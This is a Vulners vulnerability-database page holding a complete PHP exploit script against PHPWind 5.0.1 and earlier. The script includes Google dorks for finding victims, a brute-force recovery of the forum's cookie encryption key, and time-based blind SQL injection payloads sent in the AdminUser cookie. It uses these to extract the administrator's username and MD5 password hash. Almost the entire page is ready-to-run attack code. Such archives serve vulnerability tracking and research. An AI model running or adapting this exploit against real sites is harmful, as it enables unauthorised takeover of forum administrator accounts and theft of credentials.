Vulners
Lucene search
PHPWind <= 5.0.1 (AdminUser) Remote Blind SQL Injection Exploit
<?php
print_r('
---------------------------------------------------------------------------
PHPWind <= 5.0.1 "AdminUser" blind SQL injection exploit
by rgod [email protected]
site: http://retrogod.altervista.org
dorks: "powered by phpwind"
"powered by phpwind v5.0.1" -site:phpwind.net
---------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to phpwind
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-t[n]: adjust query timeout (default: 10)
-b[n]: adjust the delay for benchmark()
-e[key]: specify an encryption key, if you have it
it is an md5 fragment (18 chars)
Example:
php '.$argv[0].' localhost /phpwind/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
php '.$argv[0].' localhost /forum/ -t15 -b20000000
php '.$argv[0].' localhost / -t15 -b20000000
php '.$argv[0].' localhost / -t15 -e298af45091ebcdfbcd
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
return;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$timeout=10;
$proxy="";
$b=200000000;
$e="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
$timeout=(int) str_replace("-t","",$argv[$i]);
}
if ($temp=="-b")
{
$b=(int) str_replace("-b","",$argv[$i]);
}
if ($temp=="-e")
{
$e=str_replace("-e","",$argv[$i]);
if (!is_my_key($e)){
die("not a valid key...");
}
else {
$GLOBALS['my_fragment']=$e;
}
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
function StrCode($string,$action='ENCODE'){
$key = $GLOBALS['my_fragment'];
$string = $action == 'ENCODE' ? $string : base64_decode($string);
$len = 18;
$code = '';
for($i=0; $i<strlen($string); $i++){
$k = $i % $len;
$code .= $string[$i] ^ $key[$k];
}
$code = $action == 'DECODE' ? $code : base64_encode($code);
return $code;
}
function random($length) {
$hash = '';
$chars = '0123456789abcdef';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
function is_my_key($fragment)
{
if (ereg("^[a-f0-9]{18}",trim($fragment))) {return true;}
else {return false;}
}
//need cookie prefix...
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("lastfid=",$html);
$temp2=explode("Set-Cookie: ",$temp[0]);
$cp=$temp2[1];
echo "cookie prefix -> ".$cp."\n";
if (!$e)
{
//see sql errors... you need a valid key for strcodeii() function,
//so let's ask :)
$tt="\t";for ($i=1; $i<=255; $i++){$tt.=chr($i);}
while (1)
{
$GLOBALS['my_fragment']=random(18);
$au=StrCode($tt,"ENCODE");
$packet ="GET ".$p."admin.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cp."AdminUser=".$au.";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$html=html_entity_decode($html);
$html=str_replace("<br />","",$html);
if ((eregi("WHERE username='",$html)) and (eregi("You Can Get Help In",$html))){
$temp=explode("WHERE username='",$html);
$temp2=explode("'<br>",$temp[1]);
$decoded=$temp2[0];
if (strlen($decoded)==255) break;
}
}
$decoded="\t".$decoded;
$temp = $au;
//calculating key...
$key="";
for ($j=0; $j<18; $j++){
for ($i=0; $i<255; $i++){
$aa="";
if ($j<>0){
for ($k=1; $k<=$j; $k++){
$aa.="a";
}
}
$GLOBALS['my_fragment']=$aa.chr($i);
$t = StrCode($temp,"DECODE");
if ($t[$j]==$decoded[$j]){
$key.=chr($i);
}
}
}
if (is_my_key($key)){
echo "encryption key ->".$key."\n";
$GLOBALS['my_fragment']=$key;
}
else
{die("unable to retrieve the magic key...");}
}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
//you can use every char because of base64_decode()...so this bypass magic quotes...
$sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),benchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";
echo "sql -> ".$sql."\n";
$packet ="GET ".$p."admin.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
usleep(2000000);
$starttime=time();
echo "starttime -> ".$starttime."\r\n";
sendpacketii($packet);
if (eregi("You Can Get Help In",$html)) {
die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version...");
}
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),benchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";
echo "sql -> ".$sql."\n";
$packet ="GET ".$p."admin.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
usleep(2000000);
$starttime=time();
echo "starttime -> ".$starttime."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > $timeout) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
print_r('
--------------------------------------------------------------------------
admin user -> '.$admin.'
pwd hash (md5) -> '.$password.'
--------------------------------------------------------------------------
');
}
else {
echo "exploit failed...";
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Nov 2006 00:00Current
7.1High risk
Vulners AI Score7.1